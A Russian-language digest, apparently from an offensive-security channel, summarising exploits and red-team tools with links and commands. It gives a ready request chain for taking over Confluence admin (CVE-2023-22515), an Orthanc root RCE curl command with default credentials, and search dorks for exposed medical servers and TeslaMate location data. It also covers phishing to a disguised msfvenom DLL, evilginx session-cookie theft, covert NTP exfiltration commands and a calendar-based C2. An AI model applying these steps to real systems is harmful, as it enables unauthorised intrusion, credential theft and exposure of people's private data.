https://sensepost.com/blog/2023/browsers-cache-smuggling/

Я использую социальную инженерию, чтобы заставить сотрудников запустить мой код и получить доступ к их системе.

Я звоню им и говорю, что я из ИТ-поддержки, прошу перейти на "официальный" сайт с PowerShell-скриптом, который им нужно запустить, чтобы решить какую-то выдуманную проблему.

Но EDR блокируют подозрительные скрипты, поэтому я хотел найти более скрытный способ доставки полезной нагрузки целевым пользователям.

Простая техника, чтобы доставить вредонос на машину цели, не заставляя ее ничего скачивать. Суть в том, чтобы отдать DLL с пейлоадом из msfvenom как изображение, и заставить браузер его закэшировать. А дальше развить атаку, используя комбинацию из DLL Hijacking в связке с социальной инженерией.

Конфиг Nginx:

location /calc.dll {
  types { } default_type image/jpeg;
  add_header Tag DLLHERE;
}

Найти файл с тегом в кэше:

Select-String "DLLHERE" *

https://github.com/vchan-in/CVE-2023-35078-Exploit-POC

Remote Unauth API Access in MobileIron Core (CVE-2023-35078)

Mobile Device Management системы привлекательны для злоумышленников, так как их компрометация обеспечивает доступ к тысячам мобильных устройств.

CISA и NCSC-NO предупреждают о возможности широкого использования уязвимостей Ivanti в сетях государственного и частного секторов.

Пример использования:
python cve_2023_35078_poc.py -u http://
python cve_2023_35078_poc.py -f urls.txt

https://github.com/godaddy/tartufo

tartufo — это утилита, которая сканирует репозитории в поисках случайно оставленных токенов и учетных данных.

Она проверяет всю историю коммитов каждой существующей ветки и ищет секреты, используя регулярки и проверяя энтропию.

Установка:
pip install tartufo

Сканировать удаленный репозиторий:
tartufo scan-remote-repo git@github.com:my_user/my_repo.git

Локальный:
tartufo scan-local-repo /path/to/your/git/repo

https://github.com/blasty/unwyze

Wyze Cam v3 RCE Exploit

Я исследовал прошивку Wyze Cam V3 в рамках участия в Pwn2Own Toronto и нашел несколько критических уязвимостей. После того, как я написал эксплоит и собирался вылетать на конференцию, я узнал, что компания Wyze выпустила обновление прошивки.

Эксплоит комбинирует две уязвимости:
1. Обход аутентификации DTLS в демоне iCamera
2. Переполнение буфера стека при парсинге json
и позволяет получить шелл, зная IP камеры.

Уязвимые версии: 4.36.10.4054, 4.36.11.4679 и 4.36.11.5859

https://github.com/cosad3s/postleaks

postleaks — это сканер воркспейсов Postman, который умеет находить конфиденциальное в общедоступном.

Postman позволяет делиться шаблонами запросов к API и объединять их в воркспейсы. Разработчики часто забывают в них недокументированные эндпоинты и учетные данные.

Установка:

pip3 install postleaks

Использование:

postleaks -k <ключевое слово> (домен/компания)

https://github.com/pentagridsec/archive_pwn

archive pwn — это утилита на Python для создания zip-, tar- и cpio-архивов, которые эксплуатирует Zip Slip уязвимости.

Благодаря таким архивам, файлы можно распаковать в произвольное место на системе. В комбинации с другими уязвимостями, приводит к полной компрометации системы.

https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off-4e5

Сравнение утилит для поиска поддоменов. Запуск "из коробки" на сайте популярной авиакомпании с широким скоупом Delta Airlines и авиакомпании поменьше — Spirit Airlines.

Нашел больше всего поддоменов — BBOT.
Самые быстрые — Subfinder и Findomain.
Поощрительный приз — theHarvester.

Примечательно, что статью написала компания, чей сканер занял первое место. Количество результатов объясняют использованием API subdomain.center от неизвестной Pwning Syndicate, которое генерирует поддомены с помощью ML.

Пока не вчитывался в новую CVE-2023-22518 10/10, но знаю о CVE-2023-22515 и думаю, что они похожи.

То, почему она стала возможна, заключается в особенностях маршрутизации внутри фреймворка, который использует Confluence.

А работает он на базе Apache Struts, который, в свою очередь, использует XWork.

Это важно, потому что особенность XWork позволяет определять действия "Action" в виде Java-классов. Открываем страницу http://<confluence>/login.action, у приложения вызывается метод "execute" класса "Login".

А еще XWork умеет взаимодействовать с геттерами и сеттерами с помощью CGI-параметров. Добавим к прошлому URL ?Id=123 и вызовем setId("123") из уже знакомого Login.

У Login есть метод, который возвращает объект BootstrapStatusProvider, мы тоже можем его вызвать. А тот, в свою очередь, расширяет ActionSupport и наследует уже все его методы.

Ну, вы поняли. Раскрутив всю цепочку из геттеров, можно дойти до самого главного класса ApplicationConfig. Он управляет конфигурацией приложения и у него, как можно было доказаться, есть сеттер setupComplete.

Если мы его переопределим, то сможем заново инициализировать приложение. Для этого достаточно отправить запрос https://<confluence>/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false

А дальше открыть
https://<confluence>/setup/setupadministrator-start.action
поменять пароль админа и зайти.

Сам Confluence организует работу в куче компаний, поэтому его компрометация грозит получением доступа над всем воркспейсом сотрудников.

А эксплоит под новую CVE вы можете взять тут https://github.com/sanjai-AK47/CVE-2023-22518

https://infosecwriteups.com/how-i-hacked-1000-tesla-cars-using-osint-4cd837b8c530

Censys: "TESLAMATE" and "Dashboards" and not "sign_in"

Владельцы Tesla открывают свои админки TeslaMate без аутентификации. Там данные о машине, статистика, аналитика и все маршруты, включая дорогу до дома.

https://github.com/ShielderSec/poc/tree/main/CVE-2023-33466

Orthanc — это ПО с открытым исходным кодом для управления, обмена и визуализации данных медицинских исследований пациентов.

В версиях < 1.12.0 Orthanc подвержен уязвимости, связанной с перезаписью произвольных файлов (CVE-2023-33466), которая позволяет получить RCE в системе.

Shodan: "Orthanc Secure Area"

Пример использования:
python3 exploit.py --url "http://localhost" --config-path "/tmp/orthanc.json" --creds "orthanc:orthanc"
curl -H "Authorization: Basic $(echo -n "orthanc:orthanc" | base64)" -X POST http://localhost/tools/execute-script -d "local handle = io.popen('id'); print(handle:read('*a'))"

uid=0(root) gid=0(root) groups=0(root)

https://hackerone.com/reports/2190808

1) Перейдите по следующему URL-адресу: https://█████████.

Там вы увидите, что вошли в систему как пользователь Sys Admin. Эта роль позволяет любому пользователю загружать файлы, добавлять пользователей, изменять разрешения для пользователей и удалять пользователей.

Баг баунти Министерства обороны США 🙂

За все время сдано более 26к уязвимостей и это без вознаграждения. Не знаю, кто пишет такие сервисы (не индусы), но бюджет программы полностью окупает все ошибки.

https://github.com/MrSaighnal/GCR-Google-Calendar-RAT

Google Calendar RAT — это PoC Command&Control (C2) поверх событий Google Календаря.

Пригодится, когда сложно развернуть полноценную инфраструктуру Red Team.

Для использования GRC требуется только учетная запись Gmail. Скрипт создает «скрытый канал», используя события в Google Календаре и общаясь с целью с помощью их описания.

Недавно его использование уже было замечено в «дикой среде» https://thehackernews.com/2023/11/google-warns-of-hackers-absing-calendar.html

https://github.com/evallen/ntpescape

ntpescape — это инструмент, позволяющий скрытно осуществлять эксфильтрацию данных с компьютера, использующего протокол сетевого времени (NTP).

Он содержит множество функций, которые делают процесс эксфильтрации очень сложным для обнаружения:
— все сообщения встраиваются в пакеты легитимного NTP-клиента и не содержат никакой дополнительной информации

— все передаваемые данные шифруются с помощью секретного ключа, поэтому антивирусы не смогут обнаружить передачу данных, поскольку они будут выглядеть статистически случайными

— сервер-получатель отвечает на все отправленные клиентом пакеты так, как если бы он был настоящим NTP-сервером, отвечая реалистичными временными метками

— получатель даже имитирует собственные обновления, случайным образом выбирая Stratum-1 NTP-сервер, с которого он периодически делает вид, что "обновляется"

— все используемые данные слегка рандомизируются, чтобы имитировать реальные серверы и затруднить обнаружение пакетов с помощью IDS

Клонировать и собрать:

git clone git@github.com:evallen/ntpescape.git
make build

Запустить ресивер:

sudo ./recv

Отправить на него данные:

echo "hello, world" | ./send -d <put_server_here>:123 -tm 0 -tM 0

Собирать, структурировать и визуализировать данные удобно с помощью Maltego. Но в бесплатной версии ты быстро спотыкаешься об ограничения, а платная явно не окупает кровных исследователя.

Поэтому пришлось вспоминать о бесплатных альтернативах. Главными критериями были — возможность написания модулей (главное, чтобы это было просто и понятно) и схожесть с Maltego в построении графов с преобразованиями.

Вот несколько инструментов:

— LinkScope - копия Maltego, но бесплатная и более стабильная. Нет жесткий ограничений, как в Maltego Community (клиент вообще с открытым исходным кодом), но есть платная версия с "Installation Assistance", "Custom Compiled Binaries", "Premium Resolutions", "Commercial use" за $575, которая явно нам не понадобится.

— SpiderFoot — имеет веб-интерфейс (но можно пользоваться и из командной строки), более 200 модулей "из коробки" и интеграцию с TOR для поиска по Dark Web. Лидер по количеству встроенных инструментов, имеет платную версию с 2FA, поддержкой и Attack Surface мониторингом.

— OSINTBuddy — попытка осовременить Maltego и немного изменить подход к визуализации. Плагинов немного, но пишутся они максимально просто (проще, чем для всех остальных упомянутых программ) и их можно выполнять step-by-step прямо из веб-консоли. Большая часть OSINTBuddy разработана в одиночку, имеет свой не активный форум. Полностью бесплатный.

https://hadess.io/74-methods-for-privilege-escalationpart-2/

In this article, we examine 74 methods of improving accessibility

The Triforce of Initial Access

В то время как редтимеры любят обсуждать и почти поэтично описывать свои наборы C2-фреймворков, возможности уклонения от EDR и быстрое использование эксплойтов N-day в качестве оружия, то, что редко упоминается, — это старые добрые способы получения первоначального доступа.

Подготовка к операции всегда будет выступать решающим фактором в том, нажмет ли кто-то на вашу ссылку, с радостью выполнит инструкции, которые вы придумаете или поделится секретом от TOTP.

Поэтому сначала я предпочитаю использовать фишинг учетных записей Microsoft Office 365, чтобы получить доступ к Teams, Outlook, OneDrive, OneNote и SharePoint.

Из них можно получить достаточно информации, чтобы начать развивать более грамотную атаку.

Что можно найти:
— Пароли в открытом виде в Outlook или OneNote или Teams
— Паспорта, водительские удостоверения, свидетельства о браке и другие документы в OneDrive

1 Этап — использование evilginx с готовыми фишлетами для o365. После получения ESTSAUTHPERSISTENT- и ESTSAUTH-кук, вы можете вставить их в свой собственный браузер и эффективно пройти аутентификацию без необходимости вводить пароль пользователя или иметь дело с MFA. Это обычно называется перехватом сеанса и является более или менее стандартом де-факто в современном фишинге.

2 Этап — Rogue Office 365 and Azure (active) Directory tools или ROADtools. Эту библиотеку можно использовать как только вы получите первоначальный доступ к Entra ID-клиенту. От манипуляции с токенами, PRT Injection и регистрации устройств до возможности аутентификации практически из любого контекста: пароли, сертификаты, файлы cookie, билеты Kerberos, Access-токены, PRT и многое другое возможно с помощью RoadTX.

3 Этап — TeamFiltration. Инструмент, который позволяет автоматически извлекать данные из Microsoft Office, включая электронные письма, вложения электронной почты, чаты Teams с вложениями, файлы из OneDrive из SharePoint, а также сведения о пользователях, группах и клиентах из Entra ID.

У него существует несколько Invoke-альтернатив для постэксплуатации: AADInternals, AzureHound и GraphRunner.

Все эти этапы объединяет скрипт под названием Bobber. Он ожидает получения кук, а дальше сам вызывает все остальные инструменты по цепочке. Его можно также найти на Github https://github.com/Flangvik/Bobber.

https://research.checkpoint.com/2023/abusing-microsoft-access-linked-table-feature-to-perform-ntlm-forced-authentication-attacks/

К десяткам способам получить NTLM-хэш добавился еще один. «linking to remote SQL Server tables» из Microsoft Access автоматически передает хэши пользователей Windows через 80 порт.

https://haxx.in/posts/hacking-canon-imageclass/

Очередное (в этом году) переполнение буфера, на этот раз в принтерах CANON.

Автор позаботился и оставил ссылку на свой тулкит https://github.com/blasty/canon/